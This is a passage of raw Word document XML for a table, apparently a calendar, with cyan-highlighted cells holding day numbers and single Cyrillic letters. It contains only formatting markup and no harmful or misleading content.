                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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20" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>Ч</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>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00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="20"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>Т</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О</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00" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>И</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10</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13</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15</w:t>
            </w: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w w:val="79"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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13</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8</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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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20</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24</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13</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11</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22</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24</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26</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>13</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360" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="160"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>23</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13</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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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36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29</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16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21</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10</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18</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14</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30</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>14</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360" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="160"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="260" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="600" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="100"/>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60" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>26</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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="260" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>16</w:t>
            </w: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15</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12</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23</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>16</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c>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="160"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>24</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color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>30</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25</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color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="FFFF00"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>30</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23</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13</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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>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10</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14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20</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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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2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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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20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300" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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32</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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="160"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>1</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260" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>31</w:t>
            </w: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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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14</w:t>
            </w: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10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42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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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27</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26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w w:val="79"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>8</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FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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228" w:lineRule="exac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380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exac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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="480" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="60"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="60"/>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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="60"/>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shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="60"/>
              <w:jc w:val="right"/>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280" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>11</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00FFFF"/>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00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="40"/>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200" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
                <w:highlight w:val="cyan"/>
              </w:rPr>
              <w:t>4</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shd w:val="clear" w:color="auto" w:fill="00FFFF"/>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24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="140"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
